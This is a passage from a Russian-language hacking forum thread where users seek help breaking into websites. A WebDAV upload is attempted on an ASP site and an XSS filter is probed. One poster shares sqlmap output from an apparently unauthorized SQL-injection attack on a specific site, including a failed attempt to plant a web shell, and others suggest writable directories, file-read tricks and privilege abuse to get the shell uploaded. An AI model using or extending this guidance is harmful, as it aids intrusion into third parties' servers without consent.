Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. webworm

    webworm New Member

    Joined:
    6 Feb 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    WebDAV remote code execution

    Ya tak ponimay cheres headers PUT sozdaetsya file i dannie tuda pishutsya uje sledueshem zaprosom PUT ? Nujnni primeri
    Sait na asp , proshu pomoshi


    P.S. mogu sozdat' cherez PUT file , s razresheniem .jog i .txt , asp i .asp;.jpg ne razreshaet
     
    #1101 webworm, 6 Feb 2016
    Last edited: 6 Feb 2016
  2. Ruslan1993it

    Ruslan1993it Member

    Joined:
    24 Jun 2012
    Messages:
    72
    Likes Received:
    23
    Reputations:
    0
    Кури Wpe pro, копай в сторону charles
     
  3. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Burp Suite это не может делать?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    это же все снифферы, почему он должен не позволять?
     
    _________________________
  5. BlitzXX

    BlitzXX New Member

    Joined:
    5 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Запрос: <script>alert();</script> > Ответ : <script>alert();<\/script>
    Что возможно сделать при таком фильтре ?
     
  6. Ruslan1993it

    Ruslan1993it Member

    Joined:
    24 Jun 2012
    Messages:
    72
    Likes Received:
    23
    Reputations:
    0
    Может, все от тебя зависит, насколько ты этого хочешь, no system is safe!
     
  7. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Хочу залить шелл, нужно знать путь куда залить.
    есть доступ к phpinfo ()
    там можно узнать необходимый мне путь?
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Директива "DOCUMENT_ROOT", показывает корневой каталог сайта.
     
    _________________________
  9. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    robot.txt
    User-Agent: *
    Disallow: /public_html/Manage~/
    Disallow: /public_html/test/
    Disallow: /public_html/config.php
    Allow: /
    Allow: /public_html/

    DOCUMENT_ROOT /home/bomarbg/public_html

    [01:45:05] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux CentOS 6.5
    web application technology: PHP 5.3.3, Apache 2.2.15
    back-end DBMS: MySQL 5.0
    [01:45:05] [INFO] going to use a web backdoor for command prompt
    [01:45:05] [INFO] fingerprinting the back-end DBMS operating system
    [01:45:05] [INFO] the back-end DBMS operating system is Linux
    which web application language does the web server support?
    [1] ASP
    [2] ASPX
    [3] JSP
    [4] PHP (default)
    > 4
    [01:45:06] [WARNING] unable to retrieve automatically the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 2
    please provide a comma separate list of absolute directory paths: /home/bomarbg/public_html
    [01:45:10] [WARNING] unable to automatically parse any web server path
    [01:45:10] [INFO] trying to upload the file stager on '/home/bomarbg/public_html/' via LIMIT 'LINES TERMINATED BY' method
    [01:45:12] [WARNING] unable to upload the file stager on '/home/bomarbg/public_html/'
    [01:45:12] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 4 times
    [01:45:12] [INFO] fetched data logged to text files under 'C:\Users\.sqlmap\output\'

    [*] shutting down at 01:45:12

    magic_quotes_gpc Off
    current user is DBA: True

    Могу посмотреть и выводит --users --passwords --privileges --roles --threads=10
     
    #1109 Улыбайся, 7 Feb 2016
    Last edited: 7 Feb 2016
  10. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Прав на запись мб нету?
     
    winstrool likes this.
  11. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Как проверить через sqlmap
     
  12. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    Попробуй сначала прочитать какой-нить файл - тогда узнаешь есть ли права у пользователя мускула на чтение... Еще заюзай опцию --privileges .

    Если файл прочитается, то видать нет прав на запись в корень. Если движок известный, то пробуй стандартные пути аплоада от корня, например /home/bomarbg/public_html/uploads.
    Обязательно попробуй /home/bomarbg/public_html/test - он прописан в роботс, наверняка имеется такая дира...
    Пробуй всякие /images, /temp, /old, /download и т.п.

    P.S. Правда я не понял - через что ты хочешь залиться? Раз используешь sqlmap, то я так понял, что имеется SQLInj - или ты просто посмотрел инфу о сервере?
     
    #1112 Saint-Sky, 7 Feb 2016
    Last edited: 7 Feb 2016
    blackbox likes this.
  13. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Я хочу залить shell


    current user: 'auto12s786@localhost'

    database management system users privileges:
    [*] %auto12s786% (administrator) [12]:
    privilege: CREATE USER
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHUTDOWN
    privilege: SUPER
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Файловых привилегий нет!
     
    _________________________
  15. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    тогда когда какой вариант? создать пользователя который сможет? CREATE USER
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Как вариант попробывать вот эту тему:
    https://rdot.org/forum/showthread.php?t=741
    но это только лишь читалка...

    P.S: Читалку тестировали? load_file()
     
    _________________________
  17. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
  18. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
  19. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    ок гляну.
     
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы